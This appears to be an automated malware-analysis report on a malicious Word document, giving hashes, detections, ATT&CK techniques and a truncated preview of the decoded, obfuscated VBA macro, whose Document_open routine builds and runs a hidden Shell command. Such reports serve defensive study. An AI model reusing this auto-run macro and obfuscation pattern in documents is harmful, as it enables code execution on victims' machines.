Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa2a0fe8f7e4f6ed…

MALICIOUS

Office (OLE)

Size: 194.4 KB
Created: 2018-07-20 12:54:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 369ea5bc897d52c706e5f8217ed58497
SHA-1: 8684e37ee4eba5ec49d4f7d313e535353fc50194
SHA-256: fa2a0fe8f7e4f6ed9962c7b3e06e08a9333f0efb5743aed663370bc666f27b6e
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro and a 'Shell()' call indicate that the document is designed to execute arbitrary code upon opening. The ClamAV detection 'Doc.Malware.Valyria-6700786-0' further confirms its malicious nature. The VBA script is heavily obfuscated, but the presence of the Shell() call strongly suggests it attempts to download and execute a secondary payload.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6700786-0 (severity: critical, tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6700786-0
  • VBA macros detected (severity: medium, 2 related findings, tag: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, tag: OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (severity: high, tag: OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL (severity: info, tag: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40911 bytes
SHA-256: 81531a64269e538a98d9a1ef71233f543ec85ce283caa51d976f443b93f9d328
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "jlkGtOzLGhNnk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function zzDGwktkGRT()
On Error Resume Next
   MRLOh = 56446 / cGjod / 26455 - YIficv - VLLwFw - uNnhoP
   mVicT = 57415 / wEnhM / 86489 - IMXOoP - MEZhM - RoTZJ
   mWDtcZ = 12146 / fKAit / 35380 - zHkJq - zQcjO - tvGowm
   SYRkbK = 37688 / WOJEjG / 61890 - sjriCD - FjCdH - EapfW
   JfjTY = 29627 / jnFSFc / 25388 - aDFGmm - bMOsN - ZWBsP
   ziJfnT = 20852 / VtTSV / 43405 - LwllW - BMwUoN - Rafjk
   wXBPPY = 97043 / AsVQO / 61641 - ORQhHA - QFuGSn - lOXcO
End Function
Private Function IzPQiLLD()
On Error Resume Next
   kjFvA = 70592 / dPnrJ / 10852 - wjFdz - KWsrJk - JBssz
   cfZCmO = 57879 / nVZIlE / 34789 - wwJBH - rNlPc - cWvrq
   RGDrkI = 55510 / WSBzEr / 53967 - tqRlOn - RWmYF - ahRZO
   fVZBIb = 53842 / XGvVIG / 21118 - Piwnz - LDJQSr - OFCcI
End Function
Private Function HYtifUvkQXOAa()
On Error Resume Next
   wnWXHm = 51314 / GMYKA / 80736 - XqWPjA - sLiEO - ZTbXEr
   Tmvzq = 28740 / WuGjQ / 63773 - OTJwrf - LsCXrj - lAFIOf
   aPtlR = 42761 / XYwCn / 9416 - NIAvH - ttczf - ltAXB
   Zabdv = 73016 / wjXSw / 70940 - apqJDm - YHiSQ - GOJEqY
End Function
Private Function tnmrHHqTMRr()
On Error Resume Next
   vTAlh = 95839 / rCuDfn / 48349 - UIwWPY - WqCnX - bwdojk
   vwszl = 41274 / bUzzl / 79792 - dWsjub - JiuaoP - RPwCZ
   SSCqU = 3828 / dEnqnm / 21273 - wMBan - HBhzAj - HubrB
   MEZiD = 13689 / WFpmwc / 36786 - wzqXI - NzXwFG - EwuLG
   clisO = 59039 / hRvjz / 6331 - DuYwiZ - NMPWXc - KdUmTO
End Function
Private Sub Document_open()
On Error Resume Next
   QjJmWU = 79461 / hvuKBY / 95449 - aSknwJ - OPLwz - bZICoE
   FBObjA = 9641 / wpAkAO / 3631 - MHuInR - Mabik - dfHVBd
Shell "" + YwWILOkwNE + EnzZiGcuWKVpIG + CVar("c") + INTljCtnRowp + zuNdWmIdF + mTUUczkwQLu + NDLUWjtuhVF + iozvR + sROKVw + hjOKczo + jjYjZhBliE + tNRNSAJhV + CnBwzn + LrqAvd + IAjjjdITwb + GaFAVDDW + vazPUQbKR + QfmwnqmF + kntzibzK + UtwVKpwov, 0
   fRYoJ = 34581 / wOiUi / 93816 - DaGCSm - qGFSoz - itvukn
   rBcLKT = 459 / vLkMuG / 96702 - nrcpLT - VSKOU - ZuJHNj
   EVUIV = 19050 / OwkAOz / 44071 - PpmdP - OPPqj - zjFpF
End Sub
Private Function vzWXMjCdPi()
On Error Resume Next
   JMJOzj = 39962 / viZaYl / 95995 - ooKorz - wBfiQ - ADwwVG
   tIZbJp = 39980 / UUvfr / 68097 - wJDhuI - qtcQw - NzYpp
   bJrzbY = 87784 / tPBqlO / 513 - wwMEKM - BDkva - bCiizM
   GGOjm = 51503 / NsrSi / 80990 - irpBww - IEwHz - jjuuoU
   Hjmps = 10165 / VcWIX / 44940 - djPiwn - wYwwPp - JPYkh
   rPZOS = 14692 / jaNmD / 11017 - ZuPTO - ptrdSC - MXLoB
   GCRjEV = 36308 / EMDsw / 73430 - QfnpH - RKUYFU - noNCoB
   bpDpwI = 65468 / cAkzU / 41831 - OhAnk - SjzsqI - WvGqJ
End Function
Private Function SQBJjEoH()
On Error Resume Next
   jWscdG = 56404 / GOFBp / 28925 - IXpKw - maNfs - WiwdFw
   cmOSG = 16294 / qizokE / 57620 - EzWWb - pQOzu - AUivip
   YfEUq = 1362 / aTUXjl / 51232 - jimZs - wfzlSG - HkAEJJ
   Sdfip = 74188 / cPKMol / 62294 - VwNcMm - BKsYXp - aKsFqB
   TVUvNL = 13675 / IICvYS / 98343 - WnLcA - iYtDT - USablj
   SIoEQ = 77359 / ADwCR / 52886 - vYjwwi - jhaYY - oSEUw
End Function
Private Function OujnSTObjFi()
On Error Resume Next
   zYaiEP = 53682 / TjzTZ / 49142 - nopwA - wHmLjT - wbVpS
   XQata = 56364 / OZDIP / 11772 - bEYicz - QoWXv - XsNIA
   EqcLFp = 39189 / FTHiND / 41381 - BLXGj - KarwKL - ovAWs
   nXOvX = 44805 / ihjDQ / 25707 - UXzHpc - GcDVf - zWMuHP
   oFTfRn = 74732 / zSMTj / 42138 - BJvqIz - FqiJBb - ftPsNj
End Function
Private Function cQqWKGEn()
On Error Resume Next
   ZTBzG = 68354 / bSNcK / 20066 - oodiS - Cwadz - pPOqO
   GbCPd = 97336 / MRuTmA / 79156 - Ubnws - WdsXzE - wMbzor
   CnLWpk = 52808 / fwrZBa / 45497 - rGTudj - pRchj - tpbtNk
   mYAkVs = 72095 / HrwMU / 90349 - DSwlkw - sfuDQ - STzJl
   vIGsLB = 58060 / iHtzF / 60852 - VRaEh - sMjPL - oIQQiK
End Function


Attribute 
... (truncated)